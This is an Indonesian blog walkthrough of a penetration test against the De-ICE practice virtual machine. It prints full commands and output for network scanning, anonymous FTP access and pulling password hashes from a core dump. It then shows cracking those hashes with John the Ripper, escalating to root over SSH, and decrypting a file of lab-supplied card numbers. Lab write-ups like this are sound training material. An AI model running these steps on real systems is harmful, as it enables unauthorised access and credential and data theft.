Setelah melakukan instalasi De-ICE, sekarang kita akan melakukan uji penetrasi atau penetration testing De-ICE. Ini akan sangat sangat sangat panjang, so siapin fisik (sedia kopi, rokok, kacang) sama mental (tidur cukup, jangan cari ribut sama pacar) buat baca modul hacking kali ini. Langsung aja, jalankan De-ICE pada VMware dan buka terminal. Berikut modulnya.
Gambar De-ICE
Module:
root@bt5r1:~# nmap -n 192.168.1.1-255
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.2
Host is up (0.0000080s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
902/tcp open iss-realsecure
9876/tcp open sd
Nmap scan report for 192.168.1.110
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
631/tcp open ipp
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.254 are filtered
MAC Address: 00:50:56:F4:F6:BF (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds
Dari sini kita bisa melihat, 192.168.1.2 adalah IP kita, berarti 192.168.1.110 adalah IP De-ICE. Setelah mengetahui IP target, maka langkah berikutnya adalah mencari informasi lebih jauh tentang port yang terbuka dan service yang kemungkinan berjalan.
Module:
root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.110
Host is up (0.034s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh?
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open ipp CUPS 1.1
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds
Dari hasil scan, dapat dilihat bahwa korban mempunyai port ftp, ssh, dan httpd (Apache = Web Server) yang aktif. Informasi terasa sangat kurang, untuk itu, mari kita login ftp sebagai akun anonim untuk mencari tau lebih jauh lagi.
Module:
root@bt5r1:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password: (biarkan kosong lalu tekan "Enter")
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Sampai di sini kita telah berhasil masuk ke ftp, selanjutnya, kita akan mengeksplorasi struktur direktori sistem.
Modul:
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 80 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 7 1000 513 160 Mar 15 2007 download
drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 7 1000 513 160 Mar 15 2007 .
drwxr-xr-x 4 0 0 80 Mar 15 2007 ..
drwxr-xr-x 6 1000 513 340 Mar 15 2007 etc
drwxr-xr-x 4 1000 513 100 Mar 15 2007 opt
drwxr-xr-x 10 1000 513 400 Mar 15 2007 root
drwxr-xr-x 5 1000 513 120 Mar 15 2007 usr
drwxr-xr-x 3 1000 513 80 Mar 15 2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 513 340 Mar 15 2007 .
drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..
drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11
-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core
drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts
-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts
-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc
-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue
[snip...]
226 Directory send OK.
Lihat ada file core yang menyimpan data core dump (memory, storage, dan debugging dump). Ambil file ini untuk dianalisa, lalu kita logout ftp client.
Module:
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.03 secs (13026.4 kB/s)
ftp> exit
221 Goodbye.
Mari kita lihat file core ini. File yang kita download via ftp tadi akan otomatis tersimpat di direktori home kita, yaitu /root/
Module:
root@bt5r1:~# strings core
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d
CORE
CORE
FLINUX
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[snip...]
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Wow! Lihat huruf yang dicetak tebal berwarna merah. Itu adalah hash string password milik user De-ICE. Lalu apa selanjutnya? Kita harus melakukan cracking attack password. Ini bisa dilakukan dengan progran John The Ripper. Kita membutuhkan sebuah dictionary untuk membantu proses cracking password. Kamu bisa mendapatkan dictionary-nya di sini.
Module:
root@bt5r1:~# cd dictionaries/
root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >> /root/passwords
root@bt5r1:~/dictionaries# cd ~
Modul di atas dilakukan untuk melakukan compiling dictionary common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt
menjadi passwords di direktori /root/
Oke, kita telah mendapatkan passwordnya, sekarang, kita perlu menyusun string shadow, bermodal dari dump core yang tadi kita ambil.
Module:
root@bt5r1:~# nano /root/shadow
Setelah itu copy-paste dump core yang tercetak merah di atas:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Buang bagian merah di atas dan susun serapih mungkin menjadi:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
Oke, kita sudah punya shadow dari empat user, yaitu:
root, aadams, bbanter, ccoffee
Saatnya cracking! Kita sudah mempunyai file shadow dan password library di direktori /root/ Sekarang, lakukan modul ini:
root@bt5r1:~# cd /pentest/passwords/john/
root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
guesses: 3 time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011) c/s: 6022 trying: Meteorologic
Session aborted
Penjelasan dari modul di atas:
Kita manggunakan software bernama John The Ripper pada direktori /pentest/passwords/john/ dengan aturan library ada di /root/passwords dan target hash string di /root/shadow. Hasilnya, ada 3 password yang ter-crack dalam waktu 0:00:04:40. Yaitu:
Complexity (root)
Diatomaceous (ccoffee)
Zymurgy (bbanter)
Wah, sudah dapat passwordnya? Lantas bagaimana? Itu terserah kalian, tap berikut adalah module apa yang saya kerjakan setelah mendapatkan password-nya:
root@blue-dragon:~# ssh bbanter@192.168.1.110
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:2
RSA host key for 192.168.1.110 has changed and you have requested strict checking.
Host key verification failed.
root@blue-dragon:~# nano /root/.ssh/known_hosts
root@blue-dragon:~# ssh bbanter@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
bbanter@192.168.1.110's password: [masukkan sesuai hasil crack]
Linux 2.6.16.
bbanter@slax:~$ ls -a
./ ../ .screenrc
bbanter@slax:~$ cd ..
bbanter@slax:/home$ ls -a
./ ../ aadams/ bbanter/ ccoffee/ ftp/ root/
bbanter@slax:/home$ cd root/
bbanter@slax:/home/root$ ls -a
./ ../ .save/ .screenrc
bbanter@slax:/home/root$ cd .save/
-bash: cd: .save/: Permission denied
bbanter@slax:/home/root$ su
Password: **********
root@slax:/home/root# pwd
/home/root
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls -a
. .. copy.sh customer_account.csv.enc
root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:
3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:
root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls -a
. .. .enc copy.sh customer_account.csv customer_account.csv.enc
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#
Apa yang saya kerjakan adalah mencoba masuk ke direktori yang tingkat privilege-nya tinggi, yaitu /root/.save. Setelah masuk ternyata ada file tentang customer, cara mengambilnya adalah dengan menjalankan modul copy.sh dengan sedikit perbaikan syntax.
Sekian tutor dari saya, selamat bersenang-senang (=
By: Blue Dragon
Comments
Post a Comment